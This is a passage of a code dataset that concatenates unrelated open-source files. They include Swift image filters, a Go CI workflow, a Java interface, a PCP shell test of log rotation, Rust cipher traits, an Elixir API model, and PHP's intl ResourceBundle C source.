blackAndWhite.applyingFilter(\"CIExposureAdjust\", withInputParameters: paramsExposure)\n #endif\n }\n \n }\n}\n\nextension Kingfisher where Base: Image {\n /// Apply a `Filter` containing `CIImage` transformer to `self`.\n ///\n /// - parameter filter: The filter used to transform `self`.\n ///\n /// - returns: A transformed image by input `Filter`.\n ///\n /// - Note: Only CG-based images are supported. 
If any error happens during transforming, `self` will be returned.\n public func apply(_ filter: Filter) -> Image {\n \n guard let cgImage = cgImage else {\n assertionFailure(\"[Kingfisher] Tint image only works for CG-based image.\")\n return base\n }\n \n let inputImage = CIImage(cgImage: cgImage)\n guard let outputImage = filter.transform(inputImage) else {\n return base\n }\n \n guard let result = ciContext.createCGImage(outputImage, from: outputImage.extent) else {\n assertionFailure(\"[Kingfisher] Can not make an tint image within context.\")\n return base\n }\n \n #if os(macOS)\n return fixedForRetinaPixel(cgImage: result, to: size)\n #else\n return Image(cgImage: result, scale: base.scale, orientation: base.imageOrientation)\n #endif\n }\n\n}\n"} {"text": "//\n// ChartTableViewCell.swift\n// PNChartSwift\n//\n// Created by YiChen Zhou on 8/14/17.\n//\n\nimport UIKit\n\nclass ChartTableViewCell: UITableViewCell {\n @IBOutlet weak var cellLabel: UILabel!\n override func awakeFromNib() {\n super.awakeFromNib()\n // Initialization code\n }\n\n override func setSelected(_ selected: Bool, animated: Bool) {\n super.setSelected(selected, animated: animated)\n\n // Configure the view for the selected state\n }\n\n}\n"} {"text": "name: test all\non:\n push:\n branches:\n - master\n pull_request:\n branches:\n - master\nenv:\n PRISMA_TELEMETRY_INFORMATION: \"prisma-client-go test.yml\"\n\njobs:\n test:\n runs-on: ubuntu-latest\n\n steps:\n - uses: actions/checkout@v1\n\n - uses: actions/setup-go@v2\n with:\n go-version: '1.14'\n\n - uses: actions/cache@v2\n with:\n path: |\n ~/go/pkg/mod\n ~/.cache\n restore-keys: ${{ runner.os }}-go-\n key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }}\n\n - name: deps\n run: go mod download\n\n - name: generate\n run: go generate ./...\n env:\n DEBUG: \"*\"\n PHOTON_GO_LOG: true\n\n - name: setup\n run: go run ./test/setup/init setup\n env:\n PHOTON_GO_LOG: true\n\n - name: test\n run: go test ./... -v\n env:\n PHOTON_GO_LOG: true\n"} {"text": "/*\n * Copyright (c) 2007, 2011, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\npackage java.nio.file;\n\nimport java.io.IOException;\n\n/**\n * An object that may be registered with a watch service so that it can be\n * watched for changes and events.\n *\n *

This interface defines the {@link #register register} method to register\n * the object with a {@link WatchService} returning a {@link WatchKey} to\n * represent the registration. An object may be registered with more than one\n * watch service. Registration with a watch service is cancelled by invoking the\n * key's {@link WatchKey#cancel cancel} method.\n *\n * @since 1.7\n *\n * @see Path#register\n */\n\npublic interface Watchable {\n\n /**\n * Registers an object with a watch service.\n *\n *

If the file system object identified by this object is currently\n * registered with the watch service then the watch key, representing that\n * registration, is returned after changing the event set or modifiers to\n * those specified by the {@code events} and {@code modifiers} parameters.\n * Changing the event set does not cause pending events for the object to be\n * discarded. Objects are automatically registered for the {@link\n * StandardWatchEventKinds#OVERFLOW OVERFLOW} event. This event is not\n * required to be present in the array of events.\n *\n *

Otherwise the file system object has not yet been registered with the\n * given watch service, so it is registered and the resulting new key is\n * returned.\n *\n *

Implementations of this interface should specify the events they\n * support.\n *\n * @param watcher\n * the watch service to which this object is to be registered\n * @param events\n * the events for which this object should be registered\n * @param modifiers\n * the modifiers, if any, that modify how the object is registered\n *\n * @return a key representing the registration of this object with the\n * given watch service\n *\n * @throws UnsupportedOperationException\n * if unsupported events or modifiers are specified\n * @throws IllegalArgumentException\n * if an invalid of combination of events are modifiers are specified\n * @throws ClosedWatchServiceException\n * if the watch service is closed\n * @throws IOException\n * if an I/O error occurs\n * @throws SecurityException\n * if a security manager is installed and it denies an unspecified\n * permission required to monitor this object. Implementations of\n * this interface should specify the permission checks.\n */\n WatchKey register(WatchService watcher,\n WatchEvent.Kind[] events,\n WatchEvent.Modifier... modifiers)\n throws IOException;\n\n\n /**\n * Registers an object with a watch service.\n *\n *

An invocation of this method behaves in exactly the same way as the\n * invocation\n *

\n     *     watchable.{@link #register(WatchService,WatchEvent.Kind[],WatchEvent.Modifier[]) register}(watcher, events, new WatchEvent.Modifier[0]);\n     * 
\n *\n * @param watcher\n * the watch service to which this object is to be registered\n * @param events\n * the events for which this object should be registered\n *\n * @return a key representing the registration of this object with the\n * given watch service\n *\n * @throws UnsupportedOperationException\n * if unsupported events are specified\n * @throws IllegalArgumentException\n * if an invalid of combination of events are specified\n * @throws ClosedWatchServiceException\n * if the watch service is closed\n * @throws IOException\n * if an I/O error occurs\n * @throws SecurityException\n * if a security manager is installed and it denies an unspecified\n * permission required to monitor this object. Implementations of\n * this interface should specify the permission checks.\n */\n WatchKey register(WatchService watcher, WatchEvent.Kind... events)\n throws IOException;\n}\n"} {"text": ""} {"text": "#! /bin/sh\n# PCP QA Test No. 314\n# Exercise pmie_daily functionality - log rotation\n#\n# Copyright (c) 2007 Aconex. All Rights Reserved.\n#\n\nseq=`basename $0`\necho \"QA output created by $seq\"\n\n# get standard filters\n. ./common.product\n. ./common.filter\n. ./common.check\n\n_cleanup()\n{\n cd $here\n if $was_running\n then\n\t_restore_auto_restart pmie\n\t_service pmie start >>$here/$seq.full 2>&1\n else\n\t_service pmie stop >>$here/$seq.full 2>&1\n\t$sudo $PCP_BINADM_DIR/pmsignal -a -s TERM pmie >>$here/$seq.full 2>&1\n\t_wait_pmie_end\n fi\n $sudo rm -fr $tmp.*\n $sudo rm -fr /tmp/$seq;\n}\n\n# wait for a file to appear ...\n#\n_wait_for()\n{\n _i=0\n while [ ! -f \"$1\" ]\n do\n\t_i=`expr $_i + 1`\n\tif [ \"$_i\" -ge 100 ]\n\tthen\n\t echo \"_wait_for: failed to see file $1 after 100 iterations\"\n\t return\n\tfi\n\tpmsleep 0.1\n done\n}\n\nsignal=$PCP_BINADM_DIR/pmsignal\nstatus=1\t# failure is the default!\ntrap \"_cleanup;\nexit \\$status\" 0 1 2 3 15\n\nwas_running=false\n[ -f $PCP_RUN_DIR/pmie.pid ] && was_running=true\n\nif $was_running\nthen\n _stop_auto_restart pmie\nfi\n\n# create a pmie config file, causing frequent output (to log)\ncat > $tmp.config << EOF1\ndelta = 0.2 seconds;\nfetched = simple.numfetch;\nEOF1\n\necho \"=== pmie config ===\" >$seq.full\ncat $tmp.config >>$seq.full\n\n# create pmie control files and test out various good/bad conditions\n\ncat > $tmp.control << EOF2\n\\$version=1.0\nLOCALHOSTNAME n /tmp/$seq/1.good.log -v -c $tmp.config\nEOF2\n\necho \"=== pmie control ===\" >>$seq.full\ncat $tmp.control >>$seq.full\n\n# real QA test starts here\n_service pmie stop >>$seq.full\n_wait_pmie_end\n$sudo $signal -a -s TERM pmie 2>/dev/null\n$sudo rm -fr /tmp/$seq && mkdir /tmp/$seq || exit 1\n$sudo chown -R $PCP_USER:$PCP_GROUP /tmp/$seq\npmstore simple.numfetch 0 >/dev/null\n\n# fire em all up\necho \"Starting pmie process\"\necho \"=== pmie_check ===\" >>$seq.full\ntouch $tmp.log\n$sudo chown $PCP_USER:$PCP_GROUP $tmp.log\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_check -c $tmp.control -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\n_wait_for /tmp/$seq/1.good.log\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\nsleep 6\t\t# fill original log a bit\ncat /tmp/$seq/1.good.log >>$seq.full\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\n\necho \"Rotate, rotate...\"\nprevious=`pmdate -1d %Y%m%d`\necho \"=== pmie_daily ===\" >>$seq.full\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_daily -c $tmp.control -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\n_wait_for /tmp/$seq/1.good.log\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' 
>>$seq.full\nsleep 3\t\t# fill rotated log a bit\n\necho \"Shutdown pmie process\"\necho \"=== pmie_check ===\" >>$seq.full\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_check -c $tmp.control -s -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\n\ngrep rotated /tmp/$seq/1.good.log >/dev/null \\\n\t|| echo \"First log not rotated?\"\ngrep rotated /tmp/$seq/1.good.log.$previous >/dev/null \\\n\t|| echo \"New log not started?\"\n\n# look for data in each log file, checking rotation actually did something\noldlines=`wc -l < /tmp/$seq/1.good.log.$previous 2>/dev/null || echo 0`\nnewlines=`wc -l < /tmp/$seq/1.good.log 2>/dev/null || echo 0`\n# 5 samples / sec x ~6 sec x 2 lines per sample + 6 lines for header and footer\n# so 66\n_within_tolerance \"Old logfile line count\" \"$oldlines\" 66 %75 -v\n# 5 samples / sec x ~3 sec x 2 lines per sample + 6 lines for header and footer\n# so 36\n_within_tolerance \"New logfile line count\" \"$newlines\" 36 %75 -v\n\necho \"=== previous log ($oldlines lines) ===\" >>$seq.full\ncat /tmp/$seq/1.good.log.$previous >>$seq.full\necho \"=== current log ($newlines lines) ===\" >>$seq.full\ncat /tmp/$seq/1.good.log >>$seq.full\n\n# success, all done\nstatus=0\nexit\n"} {"text": "// Licensed under the Apache License, Version 2.0 or the MIT license\n// , at your\n// option. This file may not be copied, modified, or distributed\n// except according to those terms.\n\nuse buffer::{BufferResult, RefReadBuffer, RefWriteBuffer};\nuse cryptoutil::symm_enc_or_dec;\n\npub trait BlockEncryptor {\n fn block_size(&self) -> usize;\n fn encrypt_block(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockEncryptorX8 {\n fn block_size(&self) -> usize;\n fn encrypt_block_x8(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockDecryptor {\n fn block_size(&self) -> usize;\n fn decrypt_block(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockDecryptorX8 {\n fn block_size(&self) -> usize;\n fn decrypt_block_x8(&self, input: &[u8], output: &mut [u8]);\n}\n\n#[derive(Debug, Clone, Copy)]\npub enum SymmetricCipherError {\n InvalidLength,\n InvalidPadding\n}\n\npub trait Encryptor {\n fn encrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, eof: bool)\n -> Result;\n}\n\npub trait Decryptor {\n fn decrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, eof: bool)\n -> Result;\n}\n\npub trait SynchronousStreamCipher {\n fn process(&mut self, input: &[u8], output: &mut [u8]);\n}\n\n// TODO - Its a bit unclear to me why this is necessary\nimpl SynchronousStreamCipher for Box {\n fn process(&mut self, input: &[u8], output: &mut [u8]) {\n let me = &mut **self;\n me.process(input, output);\n }\n}\n\nimpl Encryptor for Box {\n fn encrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, _: bool)\n -> Result {\n symm_enc_or_dec(self, input, output)\n }\n}\n\nimpl Decryptor for Box {\n fn decrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, _: bool)\n -> Result {\n symm_enc_or_dec(self, input, output)\n }\n}\n"} {"text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT 
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# NOTE: This file is auto generated by the elixir code generator program.\n# Do not edit this file manually.\n\ndefmodule GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n @moduledoc \"\"\"\n A WindowsBasedSli defines good_service as the count of time windows for which the provided service was of good quality. Criteria for determining if service was good are embedded in the window_criterion.\n\n ## Attributes\n\n * `goodBadMetricFilter` (*type:* `String.t`, *default:* `nil`) - A monitoring filter (https://cloud.google.com/monitoring/api/v3/filters) specifying a TimeSeries with ValueType = BOOL. The window is good if any true values appear in the window.\n * `goodTotalRatioThreshold` (*type:* `GoogleApi.Monitoring.V3.Model.PerformanceThreshold.t`, *default:* `nil`) - A window is good if its performance is high enough.\n * `metricMeanInRange` (*type:* `GoogleApi.Monitoring.V3.Model.MetricRange.t`, *default:* `nil`) - A window is good if the metric's value is in a good range, averaged across returned streams.\n * `metricSumInRange` (*type:* `GoogleApi.Monitoring.V3.Model.MetricRange.t`, *default:* `nil`) - A window is good if the metric's value is in a good range, summed across returned streams.\n * `windowPeriod` (*type:* `String.t`, *default:* `nil`) - Duration over which window quality is evaluated. Must be an integer fraction of a day and at least 60s.\n \"\"\"\n\n use GoogleApi.Gax.ModelBase\n\n @type t :: %__MODULE__{\n :goodBadMetricFilter => String.t(),\n :goodTotalRatioThreshold => GoogleApi.Monitoring.V3.Model.PerformanceThreshold.t(),\n :metricMeanInRange => GoogleApi.Monitoring.V3.Model.MetricRange.t(),\n :metricSumInRange => GoogleApi.Monitoring.V3.Model.MetricRange.t(),\n :windowPeriod => String.t()\n }\n\n field(:goodBadMetricFilter)\n field(:goodTotalRatioThreshold, as: GoogleApi.Monitoring.V3.Model.PerformanceThreshold)\n field(:metricMeanInRange, as: GoogleApi.Monitoring.V3.Model.MetricRange)\n field(:metricSumInRange, as: GoogleApi.Monitoring.V3.Model.MetricRange)\n field(:windowPeriod)\nend\n\ndefimpl Poison.Decoder, for: GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n def decode(value, options) do\n GoogleApi.Monitoring.V3.Model.WindowsBasedSli.decode(value, options)\n end\nend\n\ndefimpl Poison.Encoder, for: GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n def encode(value, options) do\n GoogleApi.Gax.ModelBase.encode(value, options)\n end\nend\n"} {"text": "#begin document (wb/sel/70/sel_7041); part 000\nwb/sel/70/sel_7041 -1 0 [WORD] XX (TOP* - - - - * -\nwb/sel/70/sel_7041 -1 1 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 2 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 3 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 4 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 5 [WORD] VERB * mingle - 1 - * -\nwb/sel/70/sel_7041 -1 6 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 7 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 8 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 9 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 10 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 11 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 12 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 13 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 14 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 15 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 16 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 17 [WORD] XX * - - - - * 
-\nwb/sel/70/sel_7041 -1 18 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 19 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 20 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 21 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 22 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 23 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 24 [WORD] XX *) - - - - * -\n\n#end document\n"} {"text": "/*\n +----------------------------------------------------------------------+\n | This source file is subject to version 3.01 of the PHP license, |\n | that is bundled with this package in the file LICENSE, and is |\n | available through the world-wide-web at the following url: |\n | http://www.php.net/license/3_01.txt |\n | If you did not receive a copy of the PHP license and are unable to |\n | obtain it through the world-wide-web, please send a note to |\n | license@php.net so we can mail you a copy immediately. |\n +----------------------------------------------------------------------+\n | Authors: Hans-Peter Oeri (University of St.Gallen) |\n +----------------------------------------------------------------------+\n */\n\n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n\n#include \"php_intl.h\"\n#include \"intl_data.h\"\n#include \"intl_common.h\"\n\n#include \"resourcebundle/resourcebundle.h\"\n#include \"resourcebundle/resourcebundle_iterator.h\"\n#include \"resourcebundle/resourcebundle_class.h\"\n#include \"resourcebundle/resourcebundle_arginfo.h\"\n\nzend_class_entry *ResourceBundle_ce_ptr = NULL;\n\nstatic zend_object_handlers ResourceBundle_object_handlers;\n\n/* {{{ ResourceBundle_object_free */\nstatic void ResourceBundle_object_free( zend_object *object )\n{\n\tResourceBundle_object *rb = php_intl_resourcebundle_fetch_object(object);\n\n\t// only free local errors\n\tintl_error_reset( INTL_DATA_ERROR_P(rb) );\n\n\tif (rb->me) {\n\t\tures_close( rb->me );\n\t}\n\tif (rb->child) {\n\t\tures_close( rb->child );\n\t}\n\n\tzend_object_std_dtor( &rb->zend );\n}\n/* }}} */\n\n/* {{{ ResourceBundle_object_create */\nstatic zend_object *ResourceBundle_object_create( zend_class_entry *ce )\n{\n\tResourceBundle_object *rb;\n\n\trb = zend_object_alloc(sizeof(ResourceBundle_object), ce);\n\n\tzend_object_std_init( &rb->zend, ce );\n\tobject_properties_init( &rb->zend, ce);\n\n\tintl_error_init( INTL_DATA_ERROR_P(rb) );\n\trb->me = NULL;\n\trb->child = NULL;\n\n\trb->zend.handlers = &ResourceBundle_object_handlers;\n\n\treturn &rb->zend;\n}\n/* }}} */\n\n/* {{{ ResourceBundle_ctor */\nstatic int resourcebundle_ctor(INTERNAL_FUNCTION_PARAMETERS)\n{\n\tconst char *bundlename;\n\tsize_t\t\tbundlename_len = 0;\n\tconst char *locale;\n\tsize_t\t\tlocale_len = 0;\n\tzend_bool\tfallback = 1;\n\n\tzval *object = return_value;\n\tResourceBundle_object *rb = Z_INTL_RESOURCEBUNDLE_P( object );\n\n\tintl_error_reset( NULL );\n\n\tif( zend_parse_parameters( ZEND_NUM_ARGS(), \"s!s!|b\",\n\t\t&locale, &locale_len, &bundlename, &bundlename_len, &fallback ) == FAILURE )\n\t{\n\t\treturn FAILURE;\n\t}\n\n\tif (rb->me) {\n\t\tzend_throw_error(NULL, \"ResourceBundle object is already constructed\");\n\t\treturn FAILURE;\n\t}\n\n\tINTL_CHECK_LOCALE_LEN_OR_FAILURE(locale_len);\n\n\tif (locale == NULL) {\n\t\tlocale = intl_locale_get_default();\n\t}\n\n\tif (bundlename_len >= MAXPATHLEN) {\n\t\tzend_argument_value_error(2, \"is too long\");\n\t\treturn FAILURE;\n\t}\n\n\tif (fallback) {\n\t\trb->me = ures_open(bundlename, locale, &INTL_DATA_ERROR_CODE(rb));\n\t} else {\n\t\trb->me = 
ures_openDirect(bundlename, locale, &INTL_DATA_ERROR_CODE(rb));\n\t}\n\n\tINTL_CTOR_CHECK_STATUS(rb, \"resourcebundle_ctor: Cannot load libICU resource bundle\");\n\n\tif (!fallback && (INTL_DATA_ERROR_CODE(rb) == U_USING_FALLBACK_WARNING ||\n\t\t\tINTL_DATA_ERROR_CODE(rb) == U_USING_DEFAULT_WARNING)) {\n\t\tchar *pbuf;\n\t\tintl_errors_set_code(NULL, INTL_DATA_ERROR_CODE(rb));\n\t\tspprintf(&pbuf, 0, \"resourcebundle_ctor: Cannot load libICU resource \"\n\t\t\t\t\"'%s' without fallback from %s to %s\",\n\t\t\t\tbundlename ? bundlename : \"(default data)\", locale,\n\t\t\t\tures_getLocaleByType(\n\t\t\t\t\trb->me, ULOC_ACTUAL_LOCALE, &INTL_DATA_ERROR_CODE(rb)));\n\t\tintl_errors_set_custom_msg(INTL_DATA_ERROR_P(rb), pbuf, 1);\n\t\tefree(pbuf);\n\t\treturn FAILURE;\n\t}\n\n\treturn SUCCESS;\n}\n/* }}} */\n\n/* {{{ ResourceBundle object constructor */\nPHP_METHOD( ResourceBundle, __construct )\n{\n\tzend_error_handling error_handling;\n\n\tzend_replace_error_handling(EH_THROW, IntlException_ce_ptr, &error_handling);\n\treturn_value = ZEND_THIS;\n\tif (resourcebundle_ctor(INTERNAL_FUNCTION_PARAM_PASSTHRU) == FAILURE) {\n\t\tif (!EG(exception)) {\n\t\t\tzend_throw_exception(IntlException_ce_ptr, \"Constructor failed\", 0);\n\t\t}\n\t}\n\tzend_restore_error_handling(&error_handling);\n}\n/* }}} */\n\n/* {{{ */\nPHP_FUNCTION( resourcebundle_create )\n{\n\tobject_init_ex( return_value, ResourceBundle_ce_ptr );\n\tif (resourcebundle_ctor(INTERNAL_FUNCTION_PARAM_PASSTHRU) == FAILURE) {\n\t\tzval_ptr_dtor(return_value);\n\t\tRETURN_NULL();\n\t}\n}\n/* }}} */\n\n/* {{{ resourcebundle_array_fetch */\nstatic void resourcebundle_array_fetch(zend_object *object, zval *offset, zval *return_value, int fallback)\n{\n\tint32_t meindex = 0;\n\tchar * mekey = NULL;\n zend_bool is_numeric = 0;\n\tchar *pbuf;\n\tResourceBundle_object *rb;\n\n\tintl_error_reset( NULL );\n\trb = php_intl_resourcebundle_fetch_object(object);\n\n\tif(Z_TYPE_P(offset) == IS_LONG) {\n\t\tis_numeric = 1;\n\t\tmeindex = (int32_t)Z_LVAL_P(offset);\n\t\trb->child = ures_getByIndex( rb->me, meindex, rb->child, &INTL_DATA_ERROR_CODE(rb) );\n\t} else if(Z_TYPE_P(offset) == IS_STRING) {\n\t\tmekey = Z_STRVAL_P(offset);\n\t\trb->child = ures_getByKey(rb->me, mekey, rb->child, &INTL_DATA_ERROR_CODE(rb) );\n\t} else {\n\t\tintl_errors_set(INTL_DATA_ERROR_P(rb), U_ILLEGAL_ARGUMENT_ERROR,\n\t\t\t\"resourcebundle_get: index should be integer or string\", 0);\n\t\tRETURN_NULL();\n\t}\n\n\tintl_error_set_code( NULL, INTL_DATA_ERROR_CODE(rb) );\n\tif (U_FAILURE(INTL_DATA_ERROR_CODE(rb))) {\n\t\tif (is_numeric) {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load resource element %d\", meindex );\n\t\t} else {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load resource element '%s'\", mekey );\n\t\t}\n\t\tintl_errors_set_custom_msg( INTL_DATA_ERROR_P(rb), pbuf, 1 );\n\t\tefree(pbuf);\n\t\tRETURN_NULL();\n\t}\n\n\tif (!fallback && (INTL_DATA_ERROR_CODE(rb) == U_USING_FALLBACK_WARNING || INTL_DATA_ERROR_CODE(rb) == U_USING_DEFAULT_WARNING)) {\n\t\tUErrorCode icuerror;\n\t\tconst char * locale = ures_getLocaleByType( rb->me, ULOC_ACTUAL_LOCALE, &icuerror );\n\t\tif (is_numeric) {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load element %d without fallback from to %s\", meindex, locale );\n\t\t} else {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load element '%s' without fallback from to %s\", mekey, locale );\n\t\t}\n\t\tintl_errors_set_custom_msg( INTL_DATA_ERROR_P(rb), pbuf, 1 );\n\t\tefree(pbuf);\n\t\tRETURN_NULL();\n\t}\n\n\tresourcebundle_extract_value( return_value, rb );\n}\n/* }}} 
*/\n\n/* {{{ resourcebundle_array_get */\nzval *resourcebundle_array_get(zend_object *object, zval *offset, int type, zval *rv)\n{\n\tif(offset == NULL) {\n\t\tphp_error( E_ERROR, \"Cannot apply [] to ResourceBundle object\" );\n\t}\n\tZVAL_NULL(rv);\n\tresourcebundle_array_fetch(object, offset, rv, 1);\n\treturn rv;\n}\n/* }}} */\n\n/* {{{ Get resource identified by numerical index or key name. */\nPHP_FUNCTION( resourcebundle_get )\n{\n\tzend_bool fallback = 1;\n\tzval *\t\toffset;\n\tzval * object;\n\n\tif (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), \"Oz|b\",\t&object, ResourceBundle_ce_ptr, &offset, &fallback ) == FAILURE) {\n\t\tRETURN_THROWS();\n\t}\n\n\tresourcebundle_array_fetch(Z_OBJ_P(object), offset, return_value, fallback);\n}\n/* }}} */\n\n/* {{{ resourcebundle_array_count */\nint resourcebundle_array_count(zend_object *object, zend_long *count)\n{\n\tResourceBundle_object *rb = php_intl_resourcebundle_fetch_object(object);\n\n\tif (rb->me == NULL) {\n\t\tintl_errors_set(&rb->error, U_ILLEGAL_ARGUMENT_ERROR,\n\t\t\t\t\"Found unconstructed ResourceBundle\", 0);\n\t\treturn 0;\n\t}\n\n\t*count = ures_getSize( rb->me );\n\n\treturn SUCCESS;\n}\n/* }}} */\n\n/* {{{ Get resources count */\nPHP_FUNCTION( resourcebundle_count )\n{\n\tint32_t len;\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\", &object, ResourceBundle_ce_ptr ) == FAILURE ) {\n\t\tRETURN_THROWS();\n\t}\n\n\tRESOURCEBUNDLE_METHOD_FETCH_OBJECT;\n\n\tlen = ures_getSize( rb->me );\n\tRETURN_LONG( len );\n}\n\n/* {{{ Get available locales from ResourceBundle name */\nPHP_FUNCTION( resourcebundle_locales )\n{\n\tchar * bundlename;\n\tsize_t bundlename_len = 0;\n\tconst char * entry;\n\tint entry_len;\n\tUEnumeration *icuenum;\n\tUErrorCode icuerror = U_ZERO_ERROR;\n\n\tintl_errors_reset( NULL );\n\n\tif( zend_parse_parameters(ZEND_NUM_ARGS(), \"s\", &bundlename, &bundlename_len ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\tif (bundlename_len >= MAXPATHLEN) {\n\t\tzend_argument_value_error(1, \"is too long\");\n\t\tRETURN_THROWS();\n\t}\n\n\tif(bundlename_len == 0) {\n\t\t// fetch default locales list\n\t\tbundlename = NULL;\n\t}\n\n\ticuenum = ures_openAvailableLocales( bundlename, &icuerror );\n\tINTL_CHECK_STATUS(icuerror, \"Cannot fetch locales list\");\n\n\tuenum_reset( icuenum, &icuerror );\n\tINTL_CHECK_STATUS(icuerror, \"Cannot iterate locales list\");\n\n\tarray_init( return_value );\n\twhile ((entry = uenum_next( icuenum, &entry_len, &icuerror ))) {\n\t\tadd_next_index_stringl( return_value, (char *) entry, entry_len);\n\t}\n\tuenum_close( icuenum );\n}\n/* }}} */\n\n/* {{{ Get text description for ResourceBundle's last error code. */\nPHP_FUNCTION( resourcebundle_get_error_code )\n{\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\",\n\t\t&object, ResourceBundle_ce_ptr ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\trb = Z_INTL_RESOURCEBUNDLE_P( object );\n\n\tRETURN_LONG(INTL_DATA_ERROR_CODE(rb));\n}\n/* }}} */\n\n/* {{{ Get text description for ResourceBundle's last error. 
*/\nPHP_FUNCTION( resourcebundle_get_error_message )\n{\n\tzend_string* message = NULL;\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\",\n\t\t&object, ResourceBundle_ce_ptr ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\trb = Z_INTL_RESOURCEBUNDLE_P( object );\n\tmessage = intl_error_get_message(INTL_DATA_ERROR_P(rb));\n\tRETURN_STR(message);\n}\n/* }}} */\n\nPHP_METHOD(ResourceBundle, getIterator) {\n\tif (zend_parse_parameters_none() == FAILURE) {\n\t\treturn;\n\t}\n\n\tzend_create_internal_iterator_zval(return_value, ZEND_THIS);\n}\n\n/* {{{ resourcebundle_register_class\n * Initialize 'ResourceBundle' class\n */\nvoid resourcebundle_register_class( void )\n{\n\tzend_class_entry ce;\n\n\tINIT_CLASS_ENTRY( ce, \"ResourceBundle\", class_ResourceBundle_methods );\n\n\tce.create_object = ResourceBundle_object_create;\n\tce.get_iterator = resourcebundle_get_iterator;\n\n\tResourceBundle_ce_ptr = zend_register_internal_class( &ce );\n\n\tResourceBundle_object_handlers = std_object_handlers;\n\tResourceBundle_object_handlers.offset = XtOffsetOf(ResourceBundle_object, zend);\n\tResourceBundle_object_handlers.clone_obj\t = NULL; /* ICU ResourceBundle has no clone implementation */\n\tResourceBundle_object_handlers.free_obj = ResourceBundle_object_free;\n\tResourceBundle_object_handlers.read_dimension = resourcebundle_array_get;\n\tResourceBundle_object_handlers.count_elements = resourcebundle_array_count;\n\n\tzend_class_implements(ResourceBundle_ce_ptr, 2, zend_ce_aggregate, 